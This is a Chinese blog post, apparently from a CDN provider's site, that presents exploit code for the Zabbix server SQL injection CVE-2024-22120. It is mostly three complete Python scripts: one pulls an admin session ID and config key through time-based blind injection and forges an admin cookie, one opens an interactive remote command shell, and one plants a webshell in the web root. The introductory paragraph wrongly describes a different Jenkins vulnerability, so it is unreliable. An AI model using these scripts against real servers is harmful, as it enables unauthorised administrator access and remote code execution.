CVE-2024-22120 | Zabbix服务器sql注入漏洞

影响描述

        CVE-2024-23897是一个涉及Jenkins未授权文件读取的漏洞。它利用了Jenkins命令行接口(CLI)的特性,其中CLI使用args4j库解析命令行参数。args4j库具有一个特点,即当命令行参数以@字符开头时,该参数会被视为文件路径,并将该文件内容读取作为参数。利用这一特性,攻击者可以通过Jenkins CLI读取Jenkins服务器上的任意文件。

poc&exp

LoginAsAdmin.py

import hmacimport jsonimport argparseimport requestsfrom pwn import *from datetime import datetime
def SendMessage(ip, port, sid, hostid, injection):    context.log_level = "CRITICAL"    zbx_header = "ZBXDx01".encode()    message = {        "request": "command",        "sid": sid,        "scriptid": "1",        "clientip": "' + " + injection + "+ '",        "hostid": hostid    }    message_json = json.dumps(message)    message_length = struct.pack('<q', len(message_json))    message = zbx_header + message_length + message_json.encode()    r = remote(ip, port, level="CRITICAL")    r.send(message)    r.recv(1024)    r.close()
def ExtractConfigSessionKey(ip, port, sid, hostid, time_false, time_true):    token = ""    token_length = 32    for i in range(1, token_length+1):        for c in string.digits + "abcdef":            before_query = datetime.now().timestamp()            query = "(select CASE WHEN (ascii(substr((select session_key from config),%d,1))=%d) THEN sleep(%d) ELSE sleep(%d) END)" % (i, ord(c), time_true, time_false)            SendMessage(ip, port, sid, hostid, query)            after_query = datetime.now().timestamp()            if time_true > (after_query-before_query) > time_false:                continue            else:                token += c                print("(+) session_key=%s" % token, flush=True)                break    return token

def ExtractAdminSessionId(ip, port, sid, hostid, time_false, time_true):    session_id = ""    token_length = 32    for i in range(1, token_length+1):        for c in string.digits + "abcdef":            before_query = datetime.now().timestamp()            query = "(select CASE WHEN (ascii(substr((select sessionid from sessions where userid=1 limit 1),%d,1))=%d) THEN sleep(%d) ELSE sleep(%d) END)" % (i, ord(c), time_true, time_false)            SendMessage(ip, port, sid, hostid, query)            after_query = datetime.now().timestamp()            if time_true > (after_query-before_query) > time_false:                continue            else:                session_id += c                print("(+) session_id=%s" % session_id, flush=True)                break    return session_id
def GenerateAdminSession(sessionid, session_key):    def sign(data: str) -> str:        key = session_key.encode()        return hmac.new(key, data.encode('utf-8'), hashlib.sha256).hexdigest()
    def prepare_data(data: dict) -> str:        sorted_data = OrderedDict(data.items())        sorted_data['sign'] = sign(json.dumps(sorted_data, separators=(',', ':')))        return base64.b64encode(json.dumps(sorted_data, separators=(',', ':')).encode('utf-8')).decode('utf-8')
    session = {        "sessionid": sessionid,        "serverCheckResult": True,        "serverCheckTime": int(time.time())    }    res = prepare_data(session)    return res
def CheckAdminSession(ip, admin_session):    proxy = {        "https": "http://127.0.0.1:8083",        "http": "http://127.0.0.1:8083"    }    url = f"http://{ip}/zabbix.php?action=dashboard.view"    headers = {        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",        "Cookie": f"zbx_session={admin_session}"    }    resp = requests.get(url=url, headers=headers, timeout=10, proxies=proxy)    if "Administration" in resp.text and resp.status_code == 200:        return admin_session    else:        return None
if __name__ == "__main__":    parser = argparse.ArgumentParser(description="CVE-2024-22120-LoginAsAdmin")    parser.add_argument("--false_time",                        help="Time to sleep in case of wrong guess(make it smaller than true time, default=1)",                        default="1")    parser.add_argument("--true_time",                        help="Time to sleep in case of right guess(make it bigger than false time, default=10)",                        default="10")    parser.add_argument("--ip", help="Zabbix server IP")    parser.add_argument("--port", help="Zabbix server port(default=10051)", default="10051")    parser.add_argument("--sid", help="Session ID of low privileged user")    parser.add_argument("--hostid", help="hostid of any host accessible to user with defined sid")    args = parser.parse_args()    admin_sessionid = ExtractAdminSessionId(args.ip, int(args.port), args.sid, args.hostid, int(args.false_time), int(args.true_time))    session_key = ExtractConfigSessionKey(args.ip, int(args.port), args.sid, args.hostid, int(args.false_time), int(args.true_time))    admin_session = GenerateAdminSession(admin_sessionid, session_key)    res = CheckAdminSession(args.ip, admin_session)    if res is not None:        print(f"try replace cookie with:nzbx_session={res}")    else:        print("failed")

 

RCE.py

import jsonimport argparseimport requestsfrom pwn import *from datetime import datetime
def SendMessage(ip, port, sid, hostid, injection):    context.log_level = "CRITICAL"    zbx_header = "ZBXDx01".encode()    message = {        "request": "command",        "sid": sid,        "scriptid": "2",        "clientip": "' + " + injection + "+ '",        "hostid": hostid    }    message_json = json.dumps(message)    message_length = struct.pack('<q', len(message_json))    message = zbx_header + message_length + message_json.encode()    r = remote(ip, port, level="CRITICAL")    r.send(message)    r.recv(1024)    r.close()
def ExtractAdminSessionId(ip, port, sid, hostid, time_false, time_true):    session_id = ""    token_length = 32    for i in range(1, token_length+1):        for c in string.digits + "abcdef":            before_query = datetime.now().timestamp()            query = "(select CASE WHEN (ascii(substr((select sessionid from sessions where userid=1 limit 1),%d,1))=%d) THEN sleep(%d) ELSE sleep(%d) END)" % (i, ord(c), time_true, time_false)            SendMessage(ip, port, sid, hostid, query)            after_query = datetime.now().timestamp()            if time_true > (after_query-before_query) > time_false:                continue            else:                session_id += c                print("(+) session_id=%s" % session_id, flush=True)                break    return session_id
def GenerateRandomString(length):    characters = string.ascii_letters + string.digits    return "".join(random.choices(characters, k=length))
def CreateScript(url, headers, admin_sessionid, cmd):    name = GenerateRandomString(8)    payload = {        "jsonrpc": "2.0",        "method": "script.create",        "params": {            "name": name,            "command": "" + cmd + "",            "type": 0,            "execute_on": 2,            "scope": 2        },        "auth": admin_sessionid,        "id": 0,    }    resp = requests.post(url, data=json.dumps(payload), headers=headers)    return json.loads(resp.text)["result"]["scriptids"][0]
def UpdateScript(url, headers, admin_sessionid, cmd, scriptid):    payload = {        "jsonrpc": "2.0",        "method": "script.update",        "params": {            "scriptid": scriptid,            "command": "" + cmd + ""        },        "auth": admin_sessionid,        "id": 0,    }    requests.post(url, data=json.dumps(payload), headers=headers)
def DeleteScript(url, headers, admin_sessionid, scriptid):    payload = {        "jsonrpc": "2.0",        "method": "script.delete",        "params": [scriptid],        "auth": admin_sessionid,        "id": 0,    }    resp = requests.post(url, data=json.dumps(payload), headers=headers)    if resp.status_code == 200 and json.loads(resp.text)["result"]["scriptids"] == scriptid:        return True    else:        return False
def RceExploit(ip, hostid, admin_sessionid):    url = f"http://{ip}/api_jsonrpc.php"    headers = {        "content-type": "application/json",        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"    }    scriptid = CreateScript(url, headers, admin_sessionid, "whoami")    while True:        cmd = input('33[41m[zabbix_cmd]>>: 33[0m ')        if cmd == "":            print("Result of last command:")        elif cmd == "quit":            DeleteScript(url, headers, admin_sessionid, scriptid)            break        UpdateScript(url, headers, admin_sessionid, cmd, scriptid)        payload = {            "jsonrpc": "2.0",            "method": "script.execute",            "params": {                "scriptid": scriptid,                "hostid": hostid            },            "auth": admin_sessionid,            "id": 0,        }        cmd_exe = requests.post(url, data=json.dumps(payload), headers=headers)        cmd_exe_json = cmd_exe.json()        if "error" not in cmd_exe.text:            print(cmd_exe_json["result"]["value"])        else:            print(cmd_exe_json["error"]["data"])
if __name__ == "__main__":    if __name__ == "__main__":        parser = argparse.ArgumentParser(description="CVE-2024-22120-RCE")        parser.add_argument("--false_time",                            help="Time to sleep in case of wrong guess(make it smaller than true time, default=1)",                            default="1")        parser.add_argument("--true_time",                            help="Time to sleep in case of right guess(make it bigger than false time, default=10)",                            default="10")        parser.add_argument("--ip", help="Zabbix server IP")        parser.add_argument("--port", help="Zabbix server port(default=10051)", default="10051")        parser.add_argument("--sid", help="Session ID of low privileged user")        parser.add_argument("--hostid", help="hostid of any host accessible to user with defined sid")        args = parser.parse_args()        admin_sessionid = ExtractAdminSessionId(args.ip, int(args.port), args.sid, args.hostid, int(args.false_time), int(args.true_time))        RceExploit(args.ip, args.hostid, admin_sessionid)

Webshell.py

import jsonimport argparseimport requestsfrom pwn import *from datetime import datetime
def SendMessage(ip, port, sid, hostid, injection):    context.log_level = "CRITICAL"    zbx_header = "ZBXDx01".encode()    message = {        "request": "command",        "sid": sid,        "scriptid": "1",        "clientip": "' + " + injection + "+ '",        "hostid": hostid    }    message_json = json.dumps(message)    message_length = struct.pack('<q', len(message_json))    message = zbx_header + message_length + message_json.encode()    r = remote(ip, port, level="CRITICAL")    r.send(message)    r.recv(1024)    r.close()
def ExtractAdminSessionId(ip, port, sid, hostid, time_false, time_true):    session_id = ""    token_length = 32    for i in range(1, token_length+1):        for c in string.digits + "abcdef":            before_query = datetime.now().timestamp()            query = "(select CASE WHEN (ascii(substr((select sessionid from sessions where userid=1 limit 1),%d,1))=%d) THEN sleep(%d) ELSE sleep(%d) END)" % (i, ord(c), time_true, time_false)            SendMessage(ip, port, sid, hostid, query)            after_query = datetime.now().timestamp()            if time_true > (after_query-before_query) > time_false:                continue            else:                session_id += c                print("(+) session_id=%s" % session_id, flush=True)                break    return session_id
def ExecuteCommand(url, auth, cmd, hostid):    headers = {        "content-type": "application/json",        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"    }    payload = {        "jsonrpc": "2.0",        "method": "script.update",        "params": {            "scriptid": "2",            "command": "" + cmd + ""        },        "auth": auth['result'],        "id": 0,    }    requests.post(url, data=json.dumps(payload), headers=headers)    payload = {        "jsonrpc": "2.0",        "method": "script.execute",        "params": {            "scriptid": "2",            "hostid": "" + hostid + ""        },        "auth": auth['result'],        "id": 0,    }    cmd_exe = requests.post(url, data=json.dumps(payload), headers=headers)    cmd_exe_json = cmd_exe.json()    if "error" not in cmd_exe.text:        return cmd_exe_json["result"]["value"]    else:        return cmd_exe_json["error"]["data"]
def CheckWebshell(url):    headers = {        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"    }    resp = requests.get(url, headers=headers, timeout=10)    if resp.status_code == 200:        return True    else:        return False
def EchoWebshell(ip, hostid, sessionid, shell_content, shell_name):    cmd = f"echo '{shell_content}' | base64 -d > /usr/share/zabbix/{shell_name}"    url = f"http://{ip}/api_jsonrpc.php"    shell_url = f"http://{ip}/{shell_name}"    auth = json.loads('{"jsonrpc": "2.0", "result": "' + sessionid + '", "id": 0}')    print(ExecuteCommand(url, auth, cmd, hostid))    if CheckWebshell(shell_url):        print(f"webshell url: {shell_url}")    else:        print("error in write webshell")

if __name__ == "__main__":    parser = argparse.ArgumentParser(description="CVE-2024-22120-Webshell")    parser.add_argument("--false_time",                        help="Time to sleep in case of wrong guess(make it smaller than true time, default=1)",                        default="1")    parser.add_argument("--true_time",                        help="Time to sleep in case of right guess(make it bigger than false time, default=10)",                        default="10")    parser.add_argument("--ip", help="Zabbix server IP", required=True)    parser.add_argument("--port", help="Zabbix server port(default=10051)", default="10051")    parser.add_argument("--sid", help="Session ID of low privileged user")    parser.add_argument("--aid", help="Session ID of Administrator privileged user")    parser.add_argument("--hostid", help="hostid of any host accessible to user with defined sid", required=True)    parser.add_argument("--file", help="shell file path, eg:shell.php", required=True)    args = parser.parse_args()    if not args.aid:        if not args.sid:            print("need --sid")            sys.exit(0)        admin_sessionid = ExtractAdminSessionId(args.ip, int(args.port), args.sid, args.hostid, int(args.false_time),                                            int(args.true_time))    else:        admin_sessionid = args.aid    with open(args.file, "r", encoding="utf-8") as f:        shell_content = base64.b64encode(f.read().encode("utf-8")).decode("utf-8")        f.close()    EchoWebshell(args.ip, args.hostid, admin_sessionid, shell_content, os.path.basename(args.file))

原创文章,作者:速盾高防cdn,如若转载,请注明出处:https://www.sudun.com/ask/76471.html

(0)
速盾高防cdn's avatar速盾高防cdn
上一篇 2024年5月21日 下午3:38
下一篇 2024年5月21日 下午3:40

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注